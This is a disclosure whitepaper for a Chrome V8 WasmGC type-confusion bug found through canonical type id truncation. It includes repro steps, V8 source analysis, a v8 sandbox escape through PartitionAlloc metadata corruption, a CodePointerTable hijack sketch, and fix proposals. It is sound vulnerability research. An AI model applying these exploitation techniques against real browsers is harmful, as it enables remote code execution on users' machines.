# TyphoonPWN 2024 Whitepaper

Submitted by Seunghyun Lee (Xion, @0x10n)

## Target

Google Chrome RCE (no sandbox)

## Repro (Minimal PoC)

1. Run a webserver to serve the given `poc.html` file (e.g. `python3 -m http.server -b 127.0.0.1 8000`)
   - `poc.js` and `wasm-module-builder.js` should also be served from the same path
2. Start Chrome
3. Browse to `http://127.0.0.1:8000/poc.html`

The result should be an immediate crash with `STATUS_ACCESS_VIOLATION`.

## Repro (RCE)

1. Run a webserver to serve the given `exp.html` file (e.g. `python3 -m http.server -b 127.0.0.1 8000`)
   - ~~`exp.js` and `wasm-module-builder.js` should also be served from the same path~~
   - The corresponding script files are inlined into `exp.html` due to potential caching issues
2. Start Chrome with the `--no-sandbox` flag
3. Browse to `http://127.0.0.1:8000/exp.html`

The result should be a command prompt opening with arbitrary commands executed (`echo`ing of some ASCII art).

## TL;DR

WASM isorecursive canonical type id <-> `wasm::HeapType` / `wasm::ValueType` confusion in JS-to-WASM conversion functions and their wrappers (`FromJS()`, `(Wasm)JSToWasmObject()`, etc.), resulting in type confusion between arbitrary WASM types.

This can be considered a variant of [CVE-2024-2887](https://www.zerodayinitiative.com/blog/2024/5/2/cve-2024-2887-a-pwn2own-winning-bug-in-google-chrome), discovered by Manfred Paul and presented at Pwn2Own Vancouver 2024.

## Bug / Root Cause Analysis

[Types in WasmGC](https://github.com/WebAssembly/gc/blob/main/proposals/gc/MVP.md) are canonicalized to allow cross-module type checking. As WasmGC allows isorecursive types, type comparison must work between types that live in their own recursive groups in different modules. V8 implements this by "canonicalizing" all types from all modules in a single isolate into a uniquely identified `uint32_t` index. This process is implemented in https://source.chromium.org/chromium/chromium/src/+/main:v8/src/wasm/canonical-types.cc, but a very simple TL;DR would be:

1. Canonicalize type indexes in a recursive group by the following rules:
   1. Type indexes already defined (outside of its recursive group) -> use the already canonicalized value
   2. Type indexes referring to a different type within the same group -> compute the type index relative to the first type of the group and mark it as relative
2. If the canonicalized recursive group already exists in the database, use the saved indexes
3. Else, save the recursive group into the database and create new indexes (incrementally)

In this way, WasmGC supports a notion of structural type equivalence - i.e. `(type $t1 (struct (mut i32) (mut i64)))` from module M1 is equivalent to `(type $t2 (struct (mut i32) (mut i64)))` from module M2 regardless of the order in which they are canonicalized; extend this to more complex recursive groups and the idea still holds (a small model of this assignment is sketched after the snippet below). The global canonicalization database is managed by a singleton class `TypeCanonicalizer`:

```cpp
TypeCanonicalizer* GetTypeCanonicalizer() {
  return GetWasmEngine()->type_canonicalizer();
}

class TypeCanonicalizer {
 public:
  static constexpr uint32_t kPredefinedArrayI8Index = 0;
  static constexpr uint32_t kPredefinedArrayI16Index = 1;
  static constexpr uint32_t kNumberOfPredefinedTypes = 2;
  //...

 private:
  //...
  std::vector<uint32_t> canonical_supertypes_;
  // Maps groups of size >=2 to the canonical id of the first type.
  std::unordered_map<CanonicalGroup, uint32_t> canonical_groups_;
  // Maps group of size 1 to the canonical id of the type.
  std::unordered_map<CanonicalSingletonGroup, uint32_t> canonical_singleton_groups_;
  // ...
};
```
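To make the canonicalization rules above concrete, here is a minimal, self-contained model of the dedup-or-assign behavior (this is not V8 code; `ToyCanonicalizer` and the string keys are purely illustrative): structurally identical definitions receive the same canonical id no matter which module defines them, while previously unseen structures keep incrementing a global counter.

```cpp
#include <cstdint>
#include <iostream>
#include <string>
#include <unordered_map>

// Toy model of TypeCanonicalizer: keys are structural descriptions of a
// (singleton) recursive group, values are the assigned canonical type ids.
class ToyCanonicalizer {
 public:
  uint32_t Canonicalize(const std::string& structural_key) {
    auto it = db_.find(structural_key);
    if (it != db_.end()) return it->second;  // group already known -> reuse id
    uint32_t id = next_id_++;                // otherwise assign the next id
    db_.emplace(structural_key, id);
    return id;
  }

 private:
  std::unordered_map<std::string, uint32_t> db_;
  uint32_t next_id_ = 2;  // ids 0 and 1 model the predefined array i8/i16 types
};

int main() {
  ToyCanonicalizer canon;
  // Module M1 defines (struct (mut i32) (mut i64)); module M2 later defines a
  // structurally identical type -> both receive the same canonical id.
  uint32_t m1_t1 = canon.Canonicalize("struct{mut i32, mut i64}");
  uint32_t m2_t2 = canon.Canonicalize("struct{mut i32, mut i64}");
  uint32_t m2_t3 = canon.Canonicalize("struct{mut i64}");
  std::cout << m1_t1 << " " << m2_t2 << " " << m2_t3 << "\n";  // prints: 2 2 3
}
```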
A canonical type id is a globally unique `uint32_t` id representing a specific WasmGC type within the isolate. `canonical_supertypes_` is a vector representing the subtyping relationship between types, where `canonical_supertypes_[sub] = super` means that `super` is the supertype of `sub` (all in canonical type ids).

Each WASM module saves a vector to convert its internal type indexes to canonical type ids:

```cpp
struct V8_EXPORT_PRIVATE WasmModule {
  //...
  std::vector<TypeDefinition> types;  // by type index
  // Maps each type index to its global (cross-module) canonical index as per
  // isorecursive type canonicalization.
  std::vector<uint32_t> isorecursive_canonical_type_ids;
  //...
};
```

Here, `isorecursive_canonical_type_ids[t] = c` means that the type index `t` is canonicalized into the canonical type id `c`.

Note that the maximum number of types (and thus the maximum type index `t`) a single WASM module can have is `kV8MaxWasmTypes`, which is `1000000`. This is enforced in the decoding phase, in [`DecodeTypeSection()`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/wasm/module-decoder-impl.h;l=619). However, an important observation is that the canonical type id is not bound by `kV8MaxWasmTypes` in any way - it can grow as far as host memory allows, since we can simply create more WASM modules with different types (see the sketch below).
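This unbounded growth is what makes the bugs below reachable: by defining modules full of unique throwaway types, an attacker can push a victim type's canonical id to essentially any chosen value. A back-of-envelope sketch of the arithmetic (assuming a fresh isolate and ignoring the handful of ids already consumed by the predefined types and anything else loaded in the isolate):

```cpp
#include <cstdint>
#include <iostream>

// How many unique filler types must be canonicalized before the victim type so
// that the victim lands at a chosen canonical type id. Each module may define
// at most kV8MaxWasmTypes types, but the canonical id counter grows globally.
constexpr uint64_t kV8MaxWasmTypes = 1'000'000;

void Plan(uint64_t target_canonical_id) {
  uint64_t fillers = target_canonical_id;  // ids are handed out incrementally from ~0
  std::cout << "target id " << target_canonical_id << ": "
            << fillers / kV8MaxWasmTypes << " full module(s) of filler types + "
            << fillers % kV8MaxWasmTypes
            << " extra filler types, then define the victim type\n";
}

int main() {
  Plan(1'000'005);  // HeapType::kAny -> relevant to the second bug below
  Plan(0x100000);   // 2^20 -> first id that collides with id 0 after 20-bit truncation
}
```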
A quick xref to see how `isorecursive_canonical_type_ids` is used returns [`WasmWrapperGraphBuilder::FromJS()`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/compiler/wasm-compiler.cc;l=7311), the runtime function [`WasmJSToWasmObject()`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/runtime/runtime-wasm.cc;l=186) calling into [`JSToWasmObject()`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/wasm/wasm-objects.cc;l=2551), etc. Taking a look at the former, we see the following code:

```cpp
Node* FromJS(Node* input, Node* js_context, wasm::ValueType type,
             const wasm::WasmModule* module, Node* frame_state = nullptr) {
  switch (type.kind()) {
    case wasm::kRef:
    case wasm::kRefNull: {
      switch (type.heap_representation_non_shared()) {
        //...
        case wasm::HeapType::kNone:
        case wasm::HeapType::kNoFunc:
        case wasm::HeapType::kI31:
        case wasm::HeapType::kAny:
        case wasm::HeapType::kFunc:
        case wasm::HeapType::kStruct:
        case wasm::HeapType::kArray:
        case wasm::HeapType::kEq:
        default: {
          // Make sure ValueType fits in a Smi.
          static_assert(wasm::ValueType::kLastUsedBit + 1 <= kSmiValueSize);

          if (type.has_index()) {
            DCHECK_NOT_NULL(module);
            uint32_t canonical_index =
                module->isorecursive_canonical_type_ids[type.ref_index()];
            type = wasm::ValueType::RefMaybeNull(
                canonical_index,  // [!] canonical type id used as wasm::HeapType
                type.nullability());
          }

          Node* inputs[] = {
              input, mcgraph()->IntPtrConstant(
                         IntToSmi(static_cast<int>(type.raw_bit_field())))};

          return BuildCallToRuntimeWithContext(Runtime::kWasmJSToWasmObject,
                                               js_context, inputs, 2);
        }
      }
    }
    //...
  }
}
```

This function is set up to run on a JS-to-Wasm conversion boundary. Note how the canonical index `canonical_index` of the ref'd type is wrapped into `wasm::ValueType::RefMaybeNull()` and passed to the runtime function `WasmJSToWasmObject()`, eventually reaching `JSToWasmObject()`. `wasm::ValueType` is defined as follows:

```cpp
// A ValueType is encoded by two components: a ValueKind and a heap
// representation (for reference types/rtts). Those are encoded into 32 bits
// using base::BitField. The underlying ValueKind enumeration includes four
// elements which do not strictly correspond to value types: the two packed
// types i8 and i16, the void type (for control structures), and a bottom value
// (for internal use).
// ValueType encoding includes an additional bit marking the index of a type as
// relative. This should only be used during type canonicalization.
class ValueType {
 public:
  //...
  static constexpr ValueType RefMaybeNull(uint32_t heap_type,
                                          Nullability nullability) {
    DCHECK(HeapType(heap_type).is_valid());
    return ValueType(
        KindField::encode(nullability == kNullable ? kRefNull : kRef) |
        HeapTypeField::encode(heap_type));  // [!]
  }
  //...

  /**************************** Static constants ******************************/
  static constexpr int kLastUsedBit = 25;
  static constexpr int kKindBits = 5;
  static constexpr int kHeapTypeBits = 20;
  static const intptr_t kBitFieldOffset;

 private:
  // {hash_value} directly reads {bit_field_}.
  friend size_t hash_value(ValueType type);

  using KindField = base::BitField<ValueKind, 0, kKindBits>;
  using HeapTypeField = KindField::Next<uint32_t, kHeapTypeBits>;  // [!] HeapType, 20 bits wide
  // Marks a type as a canonical type which uses an index relative to its
  // recursive group start. Used only during type canonicalization.
  using CanonicalRelativeField = HeapTypeField::Next<bool, 1>;
  //...
};
```

We now clearly see that `heap_type` isn't actually designed to store a canonical type id spanning a full `uint32_t`; it is designed to store a `wasm::HeapType` - there is a confusion between the two representations (canonical type id vs. type index). As a `wasm::HeapType` can always be represented in 20 bits, the initializer (and the getters, omitted in the snippet) always truncate this value to 20 bits.

This results in the first exploitable vulnerability - the JS-to-Wasm type check may confuse canonical type ids `t1` and `t2` if `(t1 & 0xfffff) == (t2 & 0xfffff)`. Specifically, a JS-to-Wasm boundary that is typechecked to receive objects of canonical type id `tn = t0 + 0x100000 * n` (where `0 < t0 < 0x100000`) instead performs the runtime type check against the truncated `t0`. Simply put, objects of type `t0` and its subtypes can bypass type checks against `tn` and pass the JS-to-Wasm conversion, resulting in further type confusion.

But there is another exploitable vulnerability, much simpler than working with index wraparounds. The code confuses the canonical type id with `wasm::HeapType`, so could there be cases where the canonical type id is misused as a `wasm::HeapType`? Of course there are; follow the call chain to reach `JSToWasmObject()`:

```cpp
class HeapType {
 public:
  enum Representation : uint32_t {
    kFunc = kV8MaxWasmTypes,  // shorthand: c
    kEq,                      // shorthand: q
    kI31,                     // shorthand: j
    kStruct,                  // shorthand: o
    kArray,                   // shorthand: g
    kAny,                     // [!] top type ("any")
    kExtern,                  // shorthand: a.
    //...
  };
  //...
};

namespace wasm {

MaybeHandle<Object> JSToWasmObject(Isolate* isolate, Handle<Object> value,
                                   ValueType expected_canonical,
                                   const char** error_message) {
  //...
  switch (expected_canonical.heap_representation_non_shared()) {
    //...
    case HeapType::kAny: {  // [!] all non-null JS values allowed
      if (IsSmi(*value)) return CanonicalizeSmi(value, isolate);
      if (IsHeapNumber(*value)) {
        return CanonicalizeHeapNumber(value, isolate);
      }
      if (!IsNull(*value, isolate)) return value;
      *error_message = "null is not allowed for (ref any)";
      return {};
    }
    //...
  }
  //...
}
```

This results in the second, simpler vulnerability - the JS-to-Wasm type check confuses the (truncated) canonical type id with a `wasm::HeapType`. This allows all types whose canonical type id has the form `tn = kAny + 0x100000 * n` (where `kAny = 1000005`) to accept all subtypes of `any` - and since `any` is a top type, this includes everything (except null, which we don't need anyway).
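Both bugs can be demonstrated numerically. The following standalone sketch mimics the 20-bit `HeapTypeField` masking; the constants match the `ValueType` and `HeapType` definitions quoted above, while the helper itself is illustrative and not V8 code:

```cpp
#include <cstdint>
#include <iostream>

// Mimic ValueType's HeapTypeField: the heap type is stored in 20 bits, so any
// canonical type id is silently reduced modulo 2^20 when wrapped by
// RefMaybeNull() and read back via heap_representation().
constexpr uint32_t kHeapTypeBits = 20;
constexpr uint32_t kHeapTypeMask = (1u << kHeapTypeBits) - 1;
constexpr uint32_t kV8MaxWasmTypes = 1'000'000;
constexpr uint32_t kAny = kV8MaxWasmTypes + 5;  // HeapType::kAny == 1000005

uint32_t heap_representation(uint32_t canonical_id) {
  return canonical_id & kHeapTypeMask;  // what JSToWasmObject ends up switching on
}

int main() {
  // Bug 1: two distinct canonical ids collide after truncation.
  uint32_t t0 = 1234, tn = t0 + 0x100000;
  std::cout << (heap_representation(t0) == heap_representation(tn)) << "\n";  // 1

  // Bug 2: a module-defined type whose canonical id equals kAny (+ n * 2^20)
  // is treated as the abstract top type "any", so any non-null JS value passes.
  std::cout << (heap_representation(kAny) == kAny) << "\n";                   // 1
  std::cout << (heap_representation(kAny + 0x100000) == kAny) << "\n";        // 1
}
```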
## Exploit

We have a very simple but powerful exploitation primitive: arbitrary type confusion between WASM objects. Exploiting this to obtain basic exploit constructs such as caged RW, `addrOf()` and `fakeObj()` is explained well in https://www.zerodayinitiative.com/blog/2024/5/2/cve-2024-2887-a-pwn2own-winning-bug-in-google-chrome - a short summary would be to cause confusion between `(type $t1 (struct (mut i32)))`, `(type $t2 (struct (ref $t1)))` and `(type $t3 (struct (exnref)))` (corresponding to `int`, `int*` and `jsobj`, respectively).

Now the remaining piece is to escape the v8 heap sandbox. Despite the absence of publicly known techniques, escaping the v8 heap sandbox still seems to be a trivial task: abuse PartitionAlloc.

### Abusing PartitionAlloc Metadata for Arbitrary Address Write

PartitionAlloc seems to be an under-examined attack vector for v8 heap sandbox escapes, possibly because it is not included in the 4GB v8 pointer compression cage. However, it is still easily accessible within the 1TB v8 heap sandbox (the pointer compression cage <-> heap sandbox split is not a security boundary) and is rich with external pointers which are used directly without any meaningful mitigation in place.

By modifying `ArrayBuffer` object fields (via `addrOf()` + `caged_write()`), specifically the [`backing_store`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-array-buffer.h;l=48) field, it is easy to gain control over PartitionAlloc metadata. This immediately yields a `chrome.dll` address leak from `SlotSpanMetadata::bucket`.

```cpp
struct SlotSpanMetadata {
 private:
  PartitionFreelistEntry* freelist_head = nullptr;

 public:
  // TODO(lizeb): Make as many fields as possible private or const, to
  // encapsulate things more clearly.
  SlotSpanMetadata* next_slot_span = nullptr;
  PartitionBucket* const bucket = nullptr;  // [!] chrome.dll address leak

  // CHECK()ed in AllocNewSlotSpan().
  // The maximum number of bits needed to cover all currently supported OSes.
  static constexpr size_t kMaxSlotsPerSlotSpanBits = 13;
  static_assert(kMaxSlotsPerSlotSpan < (1 << kMaxSlotsPerSlotSpanBits), "");

  // |marked_full| isn't equivalent to being full. Slot span is marked as full
  // iff it isn't on the active slot span list (or any other list).
  uint32_t marked_full : 1;
  // |num_allocated_slots| is 0 for empty or decommitted slot spans, which can
  // be further differentiated by checking existence of the freelist.
  uint32_t num_allocated_slots : kMaxSlotsPerSlotSpanBits;
  uint32_t num_unprovisioned_slots : kMaxSlotsPerSlotSpanBits;

 private:
  const uint32_t can_store_raw_size_ : 1;
  uint32_t freelist_is_sorted_ : 1;
  uint32_t unused1_ : (32 - 1 - 2 * kMaxSlotsPerSlotSpanBits - 1 - 1);
  // If |in_empty_cache_|==1, |empty_cache_index| is undefined and mustn't be
  // used.
  uint16_t in_empty_cache_ : 1;
  uint16_t empty_cache_index_ : kMaxEmptyCacheIndexBits;  // < kMaxFreeableSpans.
  uint16_t unused2_ : (16 - 1 - kMaxEmptyCacheIndexBits);
  // Can use only 48 bits (6B) in this bitfield, as this structure is embedded
  // in PartitionPage which has 2B worth of fields and must fit in 32B.
  //...
};
```

Since `bucket` is later dereferenced and written to, we target this field.
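For reference, the metadata being corrupted lives at a computable offset from the allocation itself, which is how a corrupted `backing_store` (or a relative caged write) can be aimed at it. Below is a rough sketch of that address computation; all constants are assumptions for a typical 64-bit PartitionAlloc configuration (2 MiB super pages, 16 KiB partition pages, 4 KiB system pages, 32-byte per-partition-page metadata entries) and should be verified against the targeted build:

```cpp
#include <cstdint>
#include <iostream>

// Assumed default 64-bit PartitionAlloc layout constants (verify per build).
constexpr uintptr_t kSuperPageSize = 1ull << 21;      // 2 MiB, super-page aligned
constexpr uintptr_t kSystemPageSize = 1ull << 12;     // 4 KiB
constexpr uintptr_t kPartitionPageSize = 1ull << 14;  // 16 KiB
constexpr uintptr_t kPageMetadataSize = 32;           // per-partition-page metadata entry

// Rough location of the metadata entry for the partition page containing a
// slot (for multi-page slot spans, the real SlotSpanMetadata is the entry of
// the slot span's first partition page).
uintptr_t MetadataEntryAddress(uintptr_t slot_addr) {
  uintptr_t super_page = slot_addr & ~(kSuperPageSize - 1);
  uintptr_t page_index = (slot_addr & (kSuperPageSize - 1)) / kPartitionPageSize;
  // The metadata area starts one system page into the super page.
  return super_page + kSystemPageSize + page_index * kPageMetadataSize;
}

int main() {
  uintptr_t slot = 0x123456789000;  // hypothetical backing store address
  std::cout << std::hex << MetadataEntryAddress(slot) << "\n";
}
```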
Below is a code snippet involved in freeing an object:

```cpp
PA_ALWAYS_INLINE void SlotSpanMetadata::Free(
    uintptr_t slot_start, PartitionRoot* root,
    const PartitionFreelistDispatcher* freelist_dispatcher)
    // PartitionRootLock() is not defined inside partition_page.h, but
    // static analysis doesn't require the implementation.
    PA_EXCLUSIVE_LOCKS_REQUIRED(PartitionRootLock(root)) {
  //...
  if (PA_UNLIKELY(marked_full || num_allocated_slots == 0)) {
    FreeSlowPath(1);  // [!] target path
  } else {
    // All single-slot allocations must go through the slow path to
    // correctly update the raw size.
    PA_DCHECK(!CanStoreRawSize());
  }
}

void SlotSpanMetadata::FreeSlowPath(size_t number_of_freed) {
  //...
  if (marked_full) {
    //...
    marked_full = 0;
    //...
    if (PA_LIKELY(bucket->active_slot_spans_head != get_sentinel_slot_span())) {
      next_slot_span = bucket->active_slot_spans_head;
    }
    bucket->active_slot_spans_head = this;  // [!] arbitrary address write
    PA_CHECK(bucket->num_full_slot_spans);  // Underflow. // [!] constraint
    --bucket->num_full_slot_spans;          // [!] arbitrary address decrement (24-bit int)
  }
  if (PA_LIKELY(num_allocated_slots == 0)) {
    //...
    if (PA_LIKELY(this == bucket->active_slot_spans_head)) {
      bucket->SetNewActiveSlotSpan();
    }
    //...
  }
}

bool PartitionBucket::SetNewActiveSlotSpan() {
  //...
  for (; slot_span; slot_span = next_slot_span) {
    next_slot_span = slot_span->next_slot_span;  // [!] constraint: target should be zero
    //...
    if (slot_span->is_active()) {  // [!] constraint: false on zeros
      //...
    } else if (slot_span->is_empty()) {  // [!] arbitrary write
      slot_span->next_slot_span = empty_slot_spans_head;
      empty_slot_spans_head = slot_span;
    } else if (PA_LIKELY(slot_span->is_decommitted())) {
      slot_span->next_slot_span = decommitted_slot_spans_head;  // [!] arbitrary write
      decommitted_slot_spans_head = slot_span;
    } else {
      //...
    }
  }
  //...
}
```

By modifying the `bucket` field and setting the `marked_full` bit in the slot span metadata, we can reach the code in `FreeSlowPath()` and achieve an arbitrary address write, with the written value being the metadata address. Note the immediate `PA_CHECK()` - this is a constraint that our target address must satisfy. An arbitrary address decrement immediately follows, which can also be used as desired (e.g. shifting JIT code addresses in the `CodePointerTable`).

This primitive can be used to do whatever one desires, and completely arbitrary values can even be created out of thin air - once the `PA_CHECK()` constraint is satisfied at an adjacent higher address, we can "pull" the written value down, one step at a time, to the address we actually wish to write to, then repeatedly trigger the decrement to craft an arbitrary value.

We can also take the `PartitionBucket::SetNewActiveSlotSpan()` path, where `this` is the attacker-controlled `PartitionBucket*`. This allows an arbitrary write with an arbitrary value to a target pointer which currently holds NULL (plus a few more constraints that are easy to satisfy). This supplements the above primitive in cases where we wish to write arbitrary values in the middle of a vast region of zeros, where the `PA_CHECK(bucket->num_full_slot_spans)` constraint may be difficult to satisfy.
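Putting the pieces together, the primitive boils down to: point the slot span's `bucket` field (with an appropriate offset) at the victim location, set `marked_full = 1`, then free a slot belonging to that slot span. The following simplified, self-contained model (struct layouts reduced to the relevant fields; not the real PartitionAlloc definitions or offsets) shows what `FreeSlowPath()` then does with attacker-controlled state:

```cpp
#include <cassert>
#include <cstdint>
#include <iostream>

// Reduced models of the two structures involved; only the fields used by the
// corrupted-metadata write primitive are kept.
struct SlotSpanMetadata;

struct PartitionBucket {
  SlotSpanMetadata* active_slot_spans_head;  // [!] overwritten with a metadata pointer
  uint32_t num_full_slot_spans;              // [!] must be nonzero (PA_CHECK), then decremented
};

struct SlotSpanMetadata {
  SlotSpanMetadata* next_slot_span;
  PartitionBucket* bucket;   // attacker aims this at (victim address - field offset)
  uint32_t marked_full : 1;  // attacker sets this to take the FreeSlowPath branch

  // Simplified FreeSlowPath(): the "arbitrary write + arbitrary decrement".
  void FreeSlowPath() {
    if (marked_full) {
      marked_full = 0;
      bucket->active_slot_spans_head = this;  // write: *victim = &fake_metadata
      assert(bucket->num_full_slot_spans);    // constraint (PA_CHECK)
      --bucket->num_full_slot_spans;          // a 24-bit decrement in the real struct
    }
  }
};

int main() {
  PartitionBucket victim{nullptr, /*num_full_slot_spans=*/1};
  SlotSpanMetadata fake{nullptr, &victim, /*marked_full=*/1};
  fake.FreeSlowPath();
  std::cout << (victim.active_slot_spans_head == &fake) << " "
            << victim.num_full_slot_spans << "\n";  // prints: 1 0
}
```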
### Popping Shell

We've bypassed the v8 heap sandbox with the arbitrary address write primitive, and what remains is using the exploit primitives to pop a shell. Full RCE is obtained by hijacking the `CodePointerTable` (CPT) located just in front of the `Sandbox` object.

1. Prepare the ropchain, shellcode, etc. as required
2. Overwrite the CPT function table base to point to our controlled ArrayBuffer filled with our pivot gadget
3. Trigger code that calls through the CPT to invoke the pivot gadget (`JSEntry()` is the simplest one)
   - The gadget pivots the stack to the ropchain, which sets the shellcode region executable and returns to the shellcode

## Affected Version

All Chrome builds with WasmGC available, i.e. M112 up to the latest (behind Origin Trials in M112 ~ M118, shipped by default from M119). The bug was likely introduced by commit [ea69507](https://chromiumdash.appspot.com/commit/ea695079e5c3b454eba5762d18994d85f774d1bb) in M110.

## Fix

1. Use and pass canonical type ids as a full `uint32_t` value
   - Stop abusing `wasm::HeapType` to represent canonical type ids
     - `wasm::HeapType`: 20 bits wide; module-defined types are bounded by `kV8MaxWasmTypes`
     - Canonical type id: a full `uint32_t` value, bounded only by host memory limitations
   - Define a new `wasm::CanonicalType` to represent canonical type ids and avoid future mixups (see the sketch below)
     - A canonical type id is currently just a `uint32_t` value which can easily be misused as another type (especially as `wasm::HeapType`)
2. Mitigate PartitionAlloc metadata corruption to prevent v8 sandbox escapes
   - Use the `ExternalPointerTable` or a similar mechanism (`TrustedPointerTable`?) to represent `bucket`
3. Sanity-check that the canonical type id cannot overflow
   - Add a `CHECK()` so that the `canonical_supertypes_` vector never grows past 2^32 entries \
     (this requires roughly over 200GB of RAM on the target host, so an overflow may not happen in practice)
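As an illustration of fix suggestion 1, a thin strongly-typed wrapper along the following lines (the names `CanonicalTypeIndex` and `IsSubtypeOfCanonical` are hypothetical, not the actual V8 patch) would make it a compile error to hand a canonical type id to an API expecting a `wasm::HeapType` or a module-local type index:

```cpp
#include <cstdint>

// Hypothetical strongly-typed canonical id, sketching fix suggestion 1.
// A plain uint32_t silently flows into HeapType/ValueType constructors;
// a distinct wrapper type cannot.
struct CanonicalTypeIndex {
  uint32_t index;

  explicit constexpr CanonicalTypeIndex(uint32_t i) : index(i) {}
  constexpr bool operator==(CanonicalTypeIndex other) const {
    return index == other.index;
  }
};

// APIs on the JS-to-Wasm boundary would then take the wrapper explicitly...
bool IsSubtypeOfCanonical(CanonicalTypeIndex sub, CanonicalTypeIndex super);

// ...so that accidentally passing a canonical id where a 20-bit heap type is
// expected, e.g. ValueType::RefMaybeNull(canonical_index, ...), no longer
// compiles without an explicit (and reviewable) conversion.
```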